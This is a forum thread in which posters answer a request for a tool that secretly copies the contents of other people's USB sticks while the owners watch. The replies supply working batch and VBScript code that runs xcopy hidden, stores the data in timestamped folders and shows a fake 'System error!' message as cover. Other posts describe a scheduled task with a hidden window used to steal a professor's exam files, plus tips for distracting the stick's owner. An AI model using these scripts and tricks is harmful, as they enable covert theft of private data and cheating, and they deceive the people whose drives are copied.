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Hack request: Autodump USB mem stick to HDD

homebrew Hacks

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People give me their USB sticks with all kinds of interesting stuff on them so that I can give them a file.

They watch over my shoulder to make sure I dont copy any of their files to my HDD.

What I need is a prog that automatically dumps USB memory stick contents to a hidden folder in a very hidden way as soon as I plug in the drive.

Then afterwards I can just browse through what they had at my leisure.

Anyone know how?

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okay uhm theres a program called USBDumper and its a EXE that runs silently you double click nothing changes on your windows screen. the only way its detecable is if you hit ctrl alt delate and look thru the programs list. If you cant find it i have a copy i dont know where the person i got it from got it from. and you plug it in and it silently copys everything to the folder you put it in. and it'll create a file like 2006date

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I have a question: would the drive letter of the usb key be the same each time?

If so, I have a solution. It's not entirely automatic, but they're not likely to notice!

Make a batch file with the following contents:

@echo off

xcopy /E /C /H /Y f: c:usbgrab

where f: is the letter of the usbkey drive, and "c:usbgrab" is the place you want the data to go.

Save it somewhere, and then make a shortcut to it somewhere in your start menu. Go to the properties of the shortcut, and set it to run minimized. Also, set a keyboard shortcut for it such as "CTRL + SHIFT + C".

Then when you insert the usbkey, hit your chosen keyboard shortcut and it should begin to copy.

One problem is: they may notice the batch file appear on the task bar. It may be a good idea to name it something like "backup.bat" or "apache-start.bat" rather than "get-the-files-from-this-guys-usb-key.bat

The other option is to make a small exe or vbscript to do the same thing. That way, you could make it completely hidden while it runs.

A little like this:

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "xcopy /E /C /H /Y f: c:usbgrab",0,1

MsgBox("System error!")

Save that as a vbs file, make a shortcut to it in your start menu, and then setup a keybaord shortcut for it! It even has a nice little "Error" message that comes up when it's done copying ;)

I'm sure someone here knows a thing or two about getting the drive letter of the usb key automatically and that sort of thing... But that's enough to get you started at least :)


Even better! I just thought, it might be a good idea to make sure the files don't get all muddled up. So I've modified the script a little so that it makes a new folder using the current date and time to put the data in

Set WshShell = WScript.CreateObject("WScript.Shell")

Dim newDir 

newDir = Replace(Now,":","-")

newDir = Replace(newDir,"/","-")

newDir = Replace(newDir," ","-")

WshShell.Run "xcopy /E /C /H /Y f: c:usbgrab" & newDir & "",0,1

MsgBox("System error!")

Once again: "f:" being the drive letter of the usb key, and "c:usbgrab" being where you want all the data to go :)

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Once me and a friend thought on how to steal our course exams from the professor's usb disk.

We knew that every class he pops in the usb and checks some stuff on it , and we knew the exam files were on that USB.

But the problem is that we needed to get the files off the flash usb without us being on the computer or even in the same room, and without him suspecting it ofcourse.

So what we did was create a batch file and ofcourse in it was the xcopy command from E drive to some folder on C that we already created.

And to be safe incase he sees the batch at the taskbar , we opened up the command prompt window (run/cmd), and then right click on it and choose properties and then the layout tab . in the layout set the "top" windows position to 750 or more , this way the window will be hidden under the taskbar and whenever someone clicks on the tab he wont see it.

Now to be able to automatically fetch off the files from the USB disk , we created a scheduled task for the batch file , and set the run time to 1 minute and end time for 12 hours ( that means windows will run the batch file every 1 min for 12 hours ) but ofcourse the batch file wont actually work until it finds drive E which is the usb drive .

Sorry for the long post , but i hope it helps :)


P.S: since this is my first post ... Hello Everyone !

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The problem with 'backing up' someone's USB stick is that it is a pretty slow medium, so if the thing's full or large or both this will take a while. It'll take some social engineering skills to keep the stick in and the other guy preoccupied while you're copying. The activity led that a lot of sticks seem to have won't help you either...

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You can check out the Thecus Nano N1050 (

That allows you to plug in another USB mass storage device and then it can copy the contents over to the hard drive inside it. Useful if your on the run without a laptop and need to back up your digital photos etc.

Even more fun if you only have 30 seconds to grab your mates USB stick and clone it.

However the only people that I would count as having anything interesting on their memory sticks are the people that know how to protect themselves from this kind of thing.

Yes children, lets make Mr. NSA agent who is reading this cry by mentioing the 'Encryption' word.

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The problem with 'backing up' someone's USB stick is that it is a pretty slow medium, so if the thing's full or large or both this will take a while. It'll take some social engineering skills to keep the stick in and the other guy preoccupied while you're copying. The activity led that a lot of sticks seem to have won't help you either...

it may take some time but if you give the program a few secound to start copying... like mistakenly open c: drive and say wait what happend, and play dumb for a little while, the copy can start, and then when you want to copy that ONE file off it will take forever becasue another program it using the drive....

I have not tried this only have I tryed copying two files to a 2 GB usb drive and if you copy more then 1 at a time it take FOREVER

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